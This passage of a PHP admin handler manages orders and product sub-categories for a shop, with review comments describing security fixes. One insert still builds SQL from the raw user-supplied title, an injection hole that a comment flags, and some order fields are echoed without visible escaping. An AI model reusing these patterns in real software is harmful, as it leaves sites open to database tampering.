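					</td>
					<td>
						<div><?php echo $amount; ?></div>
					</td>
					<td>
						<div><?php echo $order_date; ?></div>
					</td>
					<td>
						<div><?php echo $payment_method; ?></div>
					</td>
					<td>
						<div><?php echo $msg; ?></div>
					</td>
					<td>
						<a href='#myuser' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_order" data-toggle="modal" data-target="#myuser" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
					</td>
				</tr>
			<?php

			}
		}
	}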

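	if ($_POST["command"] === "edit_order") {
		// Renders the status edit form for one `orders` row; prints nothing when the id is
		// invalid or no row matches.
		// The id is validated as an integer before it reaches the SQL text, so the same value
		// is also safe to echo into the hidden input. The surplus closing </div> that followed
		// the modal footer in the original markup is dropped.
		// NOTE(review): assumes orders.id is an integer key — confirm against the schema.
		$id = isset($_POST["id"]) ? filter_var($_POST["id"], FILTER_VALIDATE_INT) : false;
		if ($id !== false) {
			$ob->query("SELECT * FROM orders WHERE id='$id'");
		}
		if ($id !== false && $ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				?>
				<form id="order_edit_form">
					<div class="modal-body">
						<div class="form-group">
							<select class="form-control" name="status" id="status">
								<option value="0" <?php if($data["status"] == 0){echo "selected";} ?>>Order Received</option>
								<option value="1" <?php if($data["status"] == 1){echo "selected";} ?>>Processing</option>
								<option value="2" <?php if($data["status"] == 2){echo "selected";} ?>>In Shipping</option>
								<option value="3" <?php if($data["status"] == 3){echo "selected";} ?>>Delivered</option>
								<option value="4" <?php if($data["status"] == 4){echo "selected";} ?>>Returning</option>
							</select>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="reset" name="reset" class="btn btn-danger boton">
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_edit_order" />
					</div>
				</form>
				<?php
			}
		}
	}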
	
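	if ($_POST["command"] === "do_edit_order") {
		// Updates the status of one `orders` row. Answers "OK" or "failed".
		// The id must be an integer and the status must be one of the five codes the order
		// edit form offers ("0" to "4"); anything else is refused before SQL is built.
		// NOTE(review): assumes orders.id is an integer key — confirm against the schema.
		$status = isset($_POST["status"]) ? $_POST["status"] : null;
		$id = isset($_POST["id"]) ? filter_var($_POST["id"], FILTER_VALIDATE_INT) : false;

		if ($id === false || !in_array($status, array('0', '1', '2', '3', '4'), true)) {
			echo "failed";
		} else {
			$ob->query("UPDATE orders SET status='$status' WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "failed";
			}
		}
	}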

	
	///////////// SHOW SUB CATEGORIES
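	if ($_POST['command'] === "show_sub_cat") {
		// Renders one <tr> per row of `sub_category`, newest id first, with the parent
		// category name looked up per row.
		// Stored values are HTML-escaped before output, and the category id read back from
		// the row is cast to int before it is reused in the lookup query. The disabled "Edit"
		// link is no longer emitted: it sat inside an HTML comment but still printed the raw
		// id and title, so a stored title could end the comment early.
		// NOTE(review): the int cast assumes category.id is an integer key — confirm.
		$escHtml = function ($value) {
			return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
		};
		$ob->query("SELECT * FROM sub_category ORDER BY `id` DESC");
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $escHtml($data['id']);
				$cat_id = (int) $data['cat_id'];
				$title = $escHtml($data['title']);
				$image = $escHtml($data['image']);
			?>

				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM category WHERE id='$cat_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $escHtml($cat['category']);
							}
						} else {
							echo "No category";
						}
						?>
					</td>
					<td><?php echo $title; ?></td>
					<td style="text-align:center;">
						<a href="#" data-toggle="modal" data-target="#myModal_img<?php echo $id; ?>"><img src='<?php echo $image; ?>' style='max-width:100px;max-height:100px;' /></a>
					</td>
					<td>
						<a href="#myuser" id="del_sub_cat" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php

			}
		}
	}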
	
	////////////////////////////// Add Sub Category
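	if ($_POST['command'] === "do_add_sub_cat") {
		// Adds a sub-category (a `sub_category` row) under a category, together with its
		// uploaded image. Answers "OK" on success and "Failed/nTry again." otherwise.
		//
		// Upload handling: the browser-supplied $_FILES type and the client file name are not
		// trusted. The image type is detected from the file content and the stored extension
		// comes from a fixed map, so a file that is not an image can no longer be saved under
		// an arbitrary extension inside the web-served product_images/ folder.
		// NOTE(review): product_images/ should also be configured so the web server never
		// executes scripts from it.
		$title = isset($_POST['title']) ? $_POST['title'] : '';
		// NOTE(review): assumes cat_id is an integer category key — confirm against the schema.
		$cat_id = isset($_POST['cat_id']) ? filter_var($_POST['cat_id'], FILTER_VALIDATE_INT) : false;

		$folder = "product_images/";
		// Same formats the original MIME allow-list accepted, keyed by detected image type.
		$extensions = array(
			IMAGETYPE_JPEG => 'jpg',
			IMAGETYPE_PNG => 'png',
			IMAGETYPE_GIF => 'gif',
			IMAGETYPE_BMP => 'bmp',
			IMAGETYPE_TIFF_II => 'tiff',
			IMAGETYPE_TIFF_MM => 'tiff',
		);

		$tmp = '';
		if (isset($_FILES['image']['tmp_name'], $_FILES['image']['error'])
			&& is_string($_FILES['image']['tmp_name'])
			&& $_FILES['image']['error'] === UPLOAD_ERR_OK
			&& is_uploaded_file($_FILES['image']['tmp_name'])) {
			$tmp = $_FILES['image']['tmp_name'];
		}
		$info = ($tmp !== '') ? getimagesize($tmp) : false;

		$saved = false;
		if ($cat_id !== false && is_string($title)
			&& is_array($info) && isset($extensions[$info[2]])) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			// Random name: a timestamp hash repeats for two uploads within the same second.
			$img1 = $folder . bin2hex(random_bytes(16)) . '.' . $extensions[$info[2]];
			if (move_uploaded_file($tmp, $img1)) {
				// NOTE(review): $title is still interpolated into the SQL text. The
				// `database` wrapper's API is not visible here; bind it as a parameter.
				$ob->query("insert into sub_category SET title='$title', cat_id='$cat_id', image='$img1'");
				$saved = $ob->affected_rows() >= 1;
				if ($saved) {
					compress($img1, $img1, 2000, 2000, false);
				}
			}
		}
		// Report the result of this request's insert only, never a stale row count.
		if ($saved) {
			echo "OK";
		} else {
			echo "Failed/nTry again.";
		}
	}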

	/////Delete Sub Category
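	if ($_POST["command"] === "del_sub_cat") {
		// Removes a sub-category: deletes the image file named in the row, then the row
		// itself. Answers "OK" or "failed".
		// The id is request input and is validated as an integer before it reaches either query.
		// NOTE(review): assumes sub_category.id is an integer key — confirm against the schema.
		$id = isset($_POST["pro_id"]) ? filter_var($_POST["pro_id"], FILTER_VALIDATE_INT) : false;
		if ($id === false) {
			echo "failed";
		} else {
			$ob->query("SELECT * FROM sub_category WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				foreach ($ob->rows() as $data) {
					$image = $data['image'];
					// Only remove an existing regular file, so a missing image does not
					// print a warning into the response.
					// NOTE(review): the path comes from the database; consider confining
					// deletion to the upload folder (presumably product_images/).
					if (is_string($image) && is_file($image)) {
						unlink($image);
					}
				}
			}
			$ob->query("DELETE FROM sub_category WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "failed";
			}
		}
	}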

}
?>
